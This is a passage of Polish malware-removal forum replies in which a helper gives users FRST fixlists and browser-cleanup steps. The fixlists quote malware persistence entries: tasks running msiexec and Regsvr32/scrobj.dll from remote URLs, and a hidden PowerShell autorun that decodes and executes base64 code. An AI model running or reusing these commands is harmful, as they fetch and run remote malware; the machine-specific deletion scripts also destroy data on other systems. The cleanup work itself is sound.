Miszel03

OK, rozumiem

MBAM nie wykrył nic ciekawego, tylko szczątki. Wszystko co wykrył daj do kasacji (wraz z Mobogenie bo to adware - ważne pliki sobie zostaw). Jeśli nadal będzie OK to będziemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

System jest zainfekowany przez adware. Widoczne są dwie fałszywki Mozilli FireFox oraz Google Chrome (= choć nie ma oryginalnej wersji). Nie będę się rozpisywać, bo codziennie widzę tu to samo. Portale z oprogramowaniem / Instalatory - na co uważać 1. Spróbuj uruchomić plik deinstalacyjny (nazwa zbliżona do uninstall.exe) z poziomu tego folderu: C:\Program Files (x86)\UCBrowser. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {0C1D3284-F9EB-44E0-A7F7-3CC3A7352B0A} - System32\Tasks\Semogh Log => C:\Program Files (x86)\Haqayjoby\fujedom.exe [2017-05-11] (Google Inc.) Task: {B6E4A906-D5D6-4BE8-AD33-C0F5C02D0EC7} - System32\Tasks\Microsoft\Windows\DeviceSettings\Grersk => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST3500418AS_5VMCCGMVXXXX5VMCCGMV&d=20170511 /q Task: {02C2A22A-C29D-4D83-8BD7-259FE956A523} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-05-11] (UC Web Inc.) Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => RemoveDirectory: C:\Program Files (x86)\Haqayjoby RemoveDirectory: C:\Program Files (x86)\UCBrowser AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [25444] AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [1498914] AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1223458] FirewallRules: [{158FBB2C-7DB1-4EA0-8AF3-4E10CC2D8C78}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{28B582FF-A45E-4734-B6B1-E08CB917A5A1}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{E4F68CA9-4FA9-42E4-BE4E-F74481E2F6B1}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Program Files (x86)\Firefox HKLM\...\Providers\s06ycus6: C:\Program Files (x86)\Semogh Log\local64spl.dll [313856 2017-05-11] () C:\Program Files (x86)\Semogh Log IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Brak nazwy - {4EA8E362-3172-11E7-AE20-64006A5CFC23} - C:\Users\Milosz\AppData\Roaming\Przuherderse\Thicole.dll -> Brak pliku C:\Users\Milosz\AppData\Roaming\Przuherderse ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => C:\Program Files (x86)\Maoha\JiSuZip\JZipExt.dll [2016-12-27] (深圳市猫哈网络科技发展有限公司) C:\Program Files (x86)\Maoha GroupPolicy: Ograniczenia GroupPolicy\User: Ograniczenia S2 NPASRE; C:\Users\Milosz\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] S2 JszipService; C:\Program Files (x86)\Maoha\JiSuZip\JszipSvc.exe [X] R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Milosz\Desktop\Tor Browser\Start Tor Browser.lnk C:\Users\Milosz\Desktop\Pulpit\Mozilla Firefox.lnk C:\Users\Milosz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\test\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\User\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Jest już nawet w porządku, drobne poprawki oraz skan antywirusowy. Zbliżamy się do finalizacji tematu. Pewnie zauważyłeś, że nie ma skrótów do przeglądarek, ale spokojnie to standardowa procedura ich resetu, na koniec utworzysz sobie nowe. 1. Zagrożenia wykryte przez AdwCleaner daj do kasacji (za pomocą opcji Oczyść). 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Bagsarah DeleteKey: HKEY_USERS\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Bagsarah DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox DeleteKey: HKEY_USERS\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Firefox BootExecute: autocheck autochk * sh4native Sh4Removal U0 Partizan; system32\drivers\Partizan.sys [X] AlternateDataStreams: C:\Users\Public\DRM:احتضان [48] FirewallRules: [{9F752293-5243-4EAE-976C-719B5E4B0958}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Dostarcz sam plik Fixlog, już bez nowych logów FRST. Podsumuj obecny stan systemu.

System został zainfekowany poprzez adware. Przeglądarka Mozilla FireFox została całkowicie podstawiona (= brak oryginalnej instalacji), zaś do Google Chrome wkomponował (= widoczna oryginalna instalacja) się fałszywy klon co po skutkowało tym, że w cały ekran jest zaspamowany reklamami i tymi podobnymi rzeczami. P.S: SpyHunter - kasuję, to wątpliwy twór, raczej omijać. Po za tym czy to jest jakaś epidemia pośród użytkowników Windows 7 polegająca na baku antywirusa? Przejrzyj - KLIK. Portale z oprogramowaniem / Instalatory - na co uważać 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1970287958-98934462-1251740563-1000\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Bagsarah RemoveDirectory: C:\Users\Jurek\AppData\Local\Bagsarah Task: {277EC516-72C2-473C-BDC0-BE7E8AAF98F3} - \NCH Software\DebutDowngrade -> Brak pliku Task: {7CA6B8B8-45B7-4C10-8B13-A5D84209BA20} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XMWF5FTwdOWq3NWIcMWU5NWUcRWFxN8QWN8F1RTq2NH== scrobj.dll Task: {A294569E-C5C8-4F31-AF9D-6BE59D0B0586} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XMWF5FTwdOWq3NWIcMWU5NWUcRWFxN8QWN8F1RTq2NH== scrobj.dll C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk ShortcutWithArgument: C:\Users\Jurek\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Jurek\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 ShortcutWithArgument: C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 AlternateDataStreams: C:\ProgramData\TEMP:65D36A19 [129] MSCONFIG\startupreg: background_fault => "C:\Users\Jurek\AppData\Local\background_fault\aswRD.exe" "C:\Users\Jurek\AppData\Local\background_fault\bf.dll",background_fault_collector -4EAE-976C-719B5E4B0958}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [{7B690986-B997-4851-8E65-9337921C6D3F}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{C902E7C3-6CD9-47B6-944A-16CD0E73A8DB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-1970287958-98934462-1251740563-1000\Software\Microsoft\Internet Explorer\Main,Start Page = R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [103064 2017-05-11] () R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] R2 WinInstallSvc; C:\ProgramData\Microsoft\AppV\Setup\Integrator.dll [105984 2017-05-08] () [brak podpisu cyfrowego] S3 MBAMWebProtection; \??\C:\Windows\system32\drivers\mwac.sys [X] S3 MSICDSetup; \??\D:\CDriver64.sys [X] S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] RemoveDirectory: C:\Users\Jurek\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Jurek\AppData\Local\Firefox RemoveDirectory: C:\Program Files (x86)\Firefox 2017-05-03 14:50 - 2017-05-03 15:01 - 70702111 _____ C:\Users\Jurek\Desktop\SpyHunter 4.21.10.4585 Portable.rar 2017-05-11 13:02 - 2017-05-11 13:02 - 00001978 _____ C:\Users\Jurek\Desktop\big_bang_empire.lnk 2017-05-11 13:02 - 2017-05-11 13:02 - 00001952 _____ C:\Users\Jurek\Desktop\BigFarm.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Stefan\AppData\Local\Mozilla C:\Users\Stefan\AppData\Roaming\Mozilla C:\Users\Stefan\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikacje infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). bagsarah;zoohair;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

To zostawiam na koniec. Jeśli masz zgodę przełożonych to i ten komputer będę mógł wyczyść, ale później. Nie powiem, że taki stan systemu to ja widzę niecodziennie, bo widzę nawet i kilka razy dziennie co prezentuje obraz sytuacji. Masa infekcji, prefabrykowane przeglądarki, adware podmieniająca publishera i wiele wiele więcej. Proszę na systemie, na którym zostały wygenerowane raporty wykonać poniższe działania oraz pod żadnym pozorem nie wykonywać operacji związanymi z pieniędzmi. Logowanie w bankach, serwisach typu allegro do czasu zakończenia dezynfekcji stanowczo zabronione. Poniższy klucz, element trzeci korzysta z PowerShella - to nie jest normalna, zwłaszcza w takiej sytuacji i w takim miejscu. HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [{30190F18-418E-46D2-9ECB-B950915738AB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VGThFBfU').mvZBIpGaSCOHv))); Powiem wprost: podejrzewam infekcję VBKlip / Banatrix / DNSUnlocker i to nie błaha sprawa. Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające. Przejrzyj - KLIK (ew. instalacje zostaw na koniec). 1. Spróbuj przeprowadzić deinstalacje oprogramowania adware / PUP poprzez dedykowany plik deinstalacyjny (nazwa powinna być zbliżona do uninstall.exe). Przejdź do poniższych folderów i rozpocznij w każdym z nich po kolei (jeśli jest możliwość) proces usuwania. C:\Program Files (x86)\BestZiper C:\Users\And\AppData\Roaming\Event Monitor 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {5C315247-7CF8-4294-B160-6CD790E6648C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () Task: {6DE9C13A-8EE5-46B0-B795-AD460E7657A9} - System32\Tasks\RunAtStartup => C:\Users\And\AppData\Roaming\Event Monitor\em.exe Task: {83CD2AE7-350B-4D3D-B940-E7CD2C37AED2} - System32\Tasks\Reozosh => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=3219913727_67194_F412129D&d=20170509 /q Task: {6DB767A5-2000-4EDA-B4FE-EE07B4BAC81D} - System32\Tasks\Lerfopervather Host => C:\Program Files (x86)\Drabocultthhery\nahit.exe [2017-05-09] (Google Inc.) RemoveDirectory: C:\Program Files (x86)\MIO RemoveDirectory: C:\Program Files (x86)\Drabocultthhery MSCONFIG\startupreg: BestZiper => "C:\Program Files (x86)\BestZiper\BestZiper.exe" MSCONFIG\startupreg: N0FGC0HF1V04D31 => "C:\Program Files (x86)\BestZiper\5L5DB.exe" MSCONFIG\startupreg: ukoivek2U'.exe => C:\Program Files\DeviceClient\B58EKQXZ\ukoivek2U'.exe -r1_5 -r2_1 RemoveDirectory: C:\Program Files (x86)\BestZiper HKLM-x32\...\Run: [] => [X] HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [{30190F18-418E-46D2-9ECB-B950915738AB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VGThFBfU').mvZBIpGaSCOHv))); HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [background_fault] => C:\Users\And\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\RunOnce: [uninstall.exe] => C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B\uninstall.exe [759808 2017-05-10] () C:\Users\And\AppData\Local\background_fault C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B HKLM\...\Providers\qm1gaf6p: C:\Program Files (x86)\Lerfopervather Host\local64spl.dll [312832 2017-05-09] () ShellExecuteHooks: Brak nazwy - {6DE8549C-316B-11E7-A1E9-64006A5CFC23} - C:\Users\And\AppData\Roaming\Ckanovofesp\Qpution.dll [147968 2017-05-09] () RemoveDirectory: C:\Program Files (x86)\Lerfopervather Host RemoveDirectory: C:\Users\And\AppData\Roaming\Ckanovofesp CHR HomePage: Default -> hxxp://www.istartsurf.com/?type=hp&ts=1447668479&z=f316c3522e14f508af318b4g6z2zdmeqcq2bbg7b4e&from=cor&uid=SAMSUNGXHM321HI_S265J90Z835696835696 CHR StartupUrls: Default -> "hxxps://www.google.com/analytics/web/?hl=pl&pli=1#report/defaultid/a36587162w64719130p66464611/","hxxps://adwords.google.com/cm/CampaignMgmt?authuser=0&__u=1748779171&__c=8682546511#r.ONLINE.cm&app=cm","hxxps://merchants.google.com/Home?a=10826943#insights","hxxps://mysalesbee.com/#app/dashboard","hxxp://druktak.pl/administracja/login_admin.php?osCAdminID=pn0s2alrf79plgtqaqmprnmu91" R2 BIT; C:\ProgramData\BIT\BIT.dll [1858048 2017-05-09] (BIT.dll) [brak podpisu cyfrowego] R2 VNASRE; C:\Users\And\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 WinSAPSvc; C:\Users\And\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] S2 Recover; C:\Program Files\HJ32FO8OE1\CDXYBXJQWQGUU5\fDorppRER_.exe [X] C:\ProgramData\BIT C:\Users\And\AppData\Local\VNASRE C:\Users\And\AppData\Roaming\WinSAPSvc S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X] S3 netr7364; system32\DRIVERS\netr7364.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark 1200 Series\Lexmark Solution Center.LNK C:\Users\And\Links\151119.lnk C:\Users\And\Links\160602.lnk C:\Users\And\Desktop\fakt NOWY KW.lnk ShortcutWithArgument: C:\Users\And\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\And\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Eggper RemoveDirectory: C:\Program Files (x86)\Firefox EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 5. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 7. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). eggper;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 8. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Skoro tam już pomoc nie ma to poproszę o nowy zestaw raportów FRST wygenerowany najnowszą wersją FRST. GMER możesz sobie odpuścić.

Raporty nie wykazują oznak infekcji. Nie podałeś informacji o sprzęcie, więc co do trafnej oceny problemu mam związane ręce i temat przenoszę do działu Pozostałe zagadnienia komputerowe. W spoilerze działania poboczne, kosmetyka systemowe, sprzątanie po starych programach.

Dziś odpowiem w temacie, ale proszę proszę jeszcze o obowiązkowy raport GMER.

Przepraszam za zwłokę, zakładam, że tj. mówiłeś nie za dużo integrowałeś w system. W systemie sprzątam resztki po różnym oprogramowani, usuwam również elementy podejrzane z powłoki startowej. Przeglądarka Google Chrome nie jest wolna od infekcji adware, więc i jej trzeba "pomóc". Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające (i mówie tutaj o Microsoft Security Essentials i o Windows Defender). Przejrzyj - KLIK. 1. Przez panel sterowania odinstaluj: Przestarzałe i nieskuteczne programy: Spybot - Search & Destroy. Zbędniki / firmowe PUP: ZoneAlarm Security Toolbar. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X] HKU\S-1-5-21-1153295470-385941625-2631502423-1003\...\RunOnce: [CTPostBootSequencer] => "C:\Users\admin11\AppData\Local\Temp\CTPBSeq.exe" /reglaunch /self_destruct GroupPolicy: Ograniczenia CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf0bwS2LsRZodLJghBBP5Qk8mAErc83bgM58kC-zprULvzXvQXVEuJEQnAy1jY9af-yawh8wxIuwTFJZQwxG9kLc60byk8ALtFs7WlGc3KYTG94mH1bWEN8-q8K9svVIGuokqq0TutuQfauYAV1R8VTNiTi4ZFA,, CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf0bwS2LsRZodLJghBBP5Qk8mAErc83bgM58kC-zprULvzXvQXVEuJEQnAy1jY9af-yawh8wxIuwTFJZQz5v5TSI-yT13Vi6kI9mOAWlytglQlhyetw2d6YJMlsYbp0ckO6ptQ4_H4iOue778C4Hkb3WHgNiuiw,,&q={searchTerms} CHR DefaultSearchKeyword: Default -> feed.sonic-search.com CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms} S3 cpuz141; C:\Users\admin11\AppData\Local\Temp\cpuz141\cpuz141_x64.sys [46400 2017-02-12] (CPUID) S3 BlueletAudio; system32\DRIVERS\blueletaudio.sys [X] S3 BlueletSCOAudio; system32\DRIVERS\BlueletSCOAudio.sys [X] S3 BT; system32\DRIVERS\btnetdrv.sys [X] S3 Btcsrusb; System32\Drivers\btcusb.sys [X] S0 BTHidEnum; System32\Drivers\vbtenum.sys [X] S0 BTHidMgr; System32\Drivers\BTHidMgr.sys [X] S3 dbx; system32\DRIVERS\dbx.sys [X] S3 dcdbas; system32\DRIVERS\dcdbas64.sys [X] S3 GPU-Z; \??\C:\Users\admin11\AppData\Local\Temp\GPU-Z.sys [X] S3 VComm; system32\DRIVERS\VComm.sys [X] S3 VcommMgr; System32\Drivers\VcommMgr.sys [X] DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\ZM\AppData\Local\Mozilla C:\Users\ZM\AppData\Roaming\Mozilla C:\Users\ZM\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > 